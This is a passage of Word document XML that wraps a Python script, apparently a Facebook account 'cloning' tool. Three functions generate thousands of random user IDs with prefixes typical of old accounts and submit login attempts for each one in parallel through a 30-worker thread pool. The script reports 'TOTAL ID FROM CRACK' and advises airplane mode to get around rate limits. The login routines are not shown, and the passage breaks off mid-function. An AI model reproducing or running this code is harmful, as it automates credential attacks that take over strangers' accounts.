        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F777747" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5527CFA2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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_One</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="735568D1" w14:textId="3DCA0781" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA31A81" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Cloning method for accounts from 2010-2014.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="423C9504" w14:textId="5585F703" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="292D7F3D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    user = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51771742" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60C41F7C" w14:textId="6B138B27" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;49mOld Code {Y}:{G} 2010-2014”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EF8B016" w14:textId="61D09DEE" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ask = input(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;41mSELECT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0588263F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532FE1BA" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EF3882A" w14:textId="5BFAE61F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mEXAMPLE {Y}:{G} 20000 / 30000 / 99999”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBBAD2B" w14:textId="50BFE4A6" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    limit = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mSELECT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DEF127B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47A4B394" w14:textId="5D66DE6A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    star = ‘10000’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="148A05C4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    for _ in range(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(limit)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E0BF13F" w14:textId="087BF652" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        data = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>str</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(range(1000000000, 1999999999 if ask == ‘1’ else 4999999999)))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B32A479" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(data)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60DCA4B3" w14:textId="6EFE4520" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘        \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mMETHOD 1’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BA752B4" w14:textId="5B325699" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mB\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mMETHOD 2’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D1C778B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3822D328" w14:textId="478C6005" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    meth = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mCHOICE {W}(A/B): {Y}”).strip().upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B0B8032" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>max_workers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=30) as pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7341CFC2" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ECC3E43" w14:textId="2C9F88AD" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mTOTAL ID FROM CRACK {Y}: {G} {limit}{W}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C7D62B0" w14:textId="5F8F6778" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m&gt;\x1b[38;5;196m×\x1b[1;37m&lt;\x1b[38;5;46mUSE AIRPLANE MOD FOR GOOD RESULT{G}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="313FC551" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="768183EC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        for mal in user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61AEEA38" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = star + mal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E5C5F5B" w14:textId="6A86D096" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            if meth == ‘A’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C2E6F3" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3822B74B" w14:textId="2E84F823" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> meth == ‘B’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DE88DF" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42359792" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D049D99" w14:textId="5F76E677" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                print(f”    {rad}[!] INVALID METHOD SELECTED”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551EBD17" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1748F246" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648335E1" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18B6D966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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_Tow</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39BEDDAB" w14:textId="18FE7674" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A4ACB20" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Cloning method for accounts with specific prefixes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="525F7AF1" w14:textId="6E61A80B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33FC541B" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    user = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72336081" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380A26C1" w14:textId="592ABF68" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mOLD CODE {Y}:{G} 2010-2014”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="787D978C" w14:textId="210D53F8" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ask = input(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mSELECT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052BC31C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7AE8B633" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CA2C919" w14:textId="0A5F015A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mEXAMPLE {Y}:{G} 20000 / 30000 / 99999”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C09A69E" w14:textId="3E78BB65" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    limit = input(f”       \x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mSELECT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3949A968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59F4C27D" w14:textId="2296617C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    prefixes = [‘100003’, ‘100004’]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DD608BC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    for _ in range(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(limit)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3719C72D" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        prefix = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choice</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(prefixes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72FAC9A2" w14:textId="40DB72DF" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        suffix = ‘’.join(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘0123456789’, k=9))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A164636" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = prefix + suffix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639050EB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="327D3644" w14:textId="2DE2F9DC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mMETHOD A’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897A1F4" w14:textId="26E716D9" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mB\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mMETHOD B’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C2CB98D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1AD71AA3" w14:textId="6724BBEA" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    meth = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mCHOICE {W}(A/B): {Y}”).strip().upper()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49258C79" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎    with </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tred</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>max_workers</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>=30) as pool:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="408ACCB5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27DC11EC" w14:textId="0890255C" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mTOTAL ID FROM CRACK {Y}: {G} {limit}{W}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40A8603A" w14:textId="7BDE8A9A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mUSE AIRPLANE MOD FOR GOOD RESULT{G}”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16807494" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>linex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59050DA2" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> in user:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31E8DEB6" w14:textId="73D7779F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            if meth == ‘A’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB4C44F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_1, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ADBDC86" w14:textId="7E1E7D97" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎            </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>elif</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> meth == ‘B’:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FA7C1A4" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎                </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>pool.submit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">(login_2, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71BC9CEC" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎            else:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BDCFC99" w14:textId="2BB66FEC" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                print(f”    {rad}[!] INVALID METHOD SELECTED”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D364F5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎                break</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23D4C9B9" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="354B72F5" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A85F60D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</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>old_Tree</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>():</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="703D0A6A" w14:textId="524A4624" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C57F76" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    Cloning method for accounts from 2009-2010.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63B7D4EA" w14:textId="4CA1C6E7" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    “””</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E700960" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    user = []</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B245EB9" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D52B78C" w14:textId="7572C522" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mOLD CODE {Y}:{G} 2009-2010”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7958559D" w14:textId="6EF2943B" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ask = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mSELECT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD96D7B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4C49F4DB" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    ____banner____()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C4341FC" w14:textId="3758CA8A" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mEXAMPLE {Y}:{G} 20000 / 30000 / 99999”)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B4744E0" w14:textId="5F56EC22" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    limit = input(f”       \x1b[38;5;196m(\x1b[1;37m★\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mTOTAL ID COUNT {Y}:{G} “)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="082A2789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543B644C" w14:textId="409C235F" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    prefix = ‘1000004’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058393ED" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    for _ in range(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(limit)):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CE962F" w14:textId="5CC83465" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎        suffix = ‘’.join(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>random.choices</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(‘0123456789’, k=8))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47644D8F" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = prefix + suffix</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E004189" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t xml:space="preserve">‎        </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>user.append</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1ADF15C4" w14:textId="74D8AC14" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mA\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mMETHOD A’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B52B061" w14:textId="4E0FA313" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
        <w:t>‎    print(‘       \x1b[38;5;196m(\x1b[1;37mB\x1b[38;5;196m)\x1b[1;37m\x1b[38;5;196m\x1b[1;37m\x1b[38;5;46mMethod B’)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E457193" w14:textId="77777777" w:rsidR="00906AC6" w:rsidRDefault="00906AC6">
      <w:r>
